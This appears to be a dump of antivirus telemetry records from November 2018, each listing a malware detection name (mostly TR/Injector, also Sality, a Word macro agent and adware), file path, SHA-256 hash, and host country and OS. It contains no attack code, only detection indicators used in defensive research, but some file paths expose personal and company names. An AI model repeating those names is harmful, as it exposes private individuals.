  Row(detection=Row(filename='avscan-20181102-060356-0d62fcb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060356-0D62FCB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055311-8cf0f614', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055311-8CF0F614', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061808-09be0e7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061808-09BE0E7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061126-19bc496e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061126-19BC496E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060850-bd15e86d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060850-BD15E86D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053506-0694dc8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053506-0694DC8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053528-1387206c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053528-1387206C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052954-4c9263e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052954-4C9263E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052921-39028d2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052921-39028D2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062045-66caf37b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062045-66CAF37B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051805-a5a9466b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051805-A5A9466B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050952-8012531a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050952-8012531A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061642-d685c833', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061642-D685C833', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052334-6a033072', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052334-6A033072', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052115-16fbc738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052115-16FBC738', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062528-0fae6d36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062528-0FAE6D36', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062544-19552b07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062544-19552B07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053520-0eb1eba5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053520-0EB1EBA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052631-d3b15e62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052631-D3B15E62', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052404-7bc83541', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052404-7BC83541', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050415-b6fd6e82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050415-B6FD6E82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060052-9fb5a476', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060052-9FB5A476', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061656-de5b8b7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061656-DE5B8B7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062348-d429ca4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062348-D429CA4C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054146-f4e44f6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054146-F4E44F6F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053347-d74c4492', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053347-D74C4492', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054443-5e4267bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054443-5E4267BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051948-e39e6004', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051948-E39E6004', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055454-ca7b44de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055454-CA7B44DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051746-9acc9451', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051746-9ACC9451', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052042-03a05756', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052042-03A05756', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060708-802f513d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060708-802F513D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051259-efb0d95f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051259-EFB0D95F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050637-0bd9c3a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050637-0BD9C3A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060049-9e40fa72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060049-9E40FA72', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053407-e349be95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053407-E349BE95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053743-64153a02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053743-64153A02', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060118-afcabe60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060118-AFCABE60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061536-af1a22ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061536-AF1A22AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054838-eaaeeb73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054838-EAAEEB73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052521-a9aedf7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052521-A9AEDF7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053746-65f70a35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053746-65F70A35', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053337-d156327e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053337-D156327E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052508-a1d0e1b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052508-A1D0E1B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060029-9274e769', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060029-9274E769', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054149-f6a286c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054149-F6A286C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\LAILA\\R5-SSS of Diff. com\\SSS-DIFF. COMPANY\\NELTEX\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='11a2d2f42bbe475c20bf767b3939527ec32f51983a05765931eaf39f74b41b10', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:42:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170644-8c9a07c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-170558-84D52381\\AVSCAN-20181101-170644-8C9A07C8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:06:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskscheduler.exe', filepath='C:\\Program Files\\CyberLink\\PowerDVD10\\PowerDVD Cinema\\TaskScheduler.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='4f83e2a9483b7ab19fcb8a2d46098ce40ca7f60ba47fa697b0bc5fb66dbe1e01', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T02:58:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180549-7472e29c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180326-5A952DDD\\AVSCAN-20181101-180549-7472E29C', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:05:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='47416a6a0029d7e4dc328f9831ec8e1eee7e79cfb1a9cf8273f68d61594971d4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\47416A6A0029D7E4DC328F9831EC8E1EEE7E79CFB1A9CF8273F68D61594971D4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='47416a6a0029d7e4dc328f9831ec8e1eee7e79cfb1a9cf8273f68d61594971d4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210549-1e3f7ad9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210549-1E3F7AD9', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hiplifes cool.exe', filepath='D:\\Hiplifes Cool.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:34:59Z'), dt=datetime.date(2018, 11, 1)),
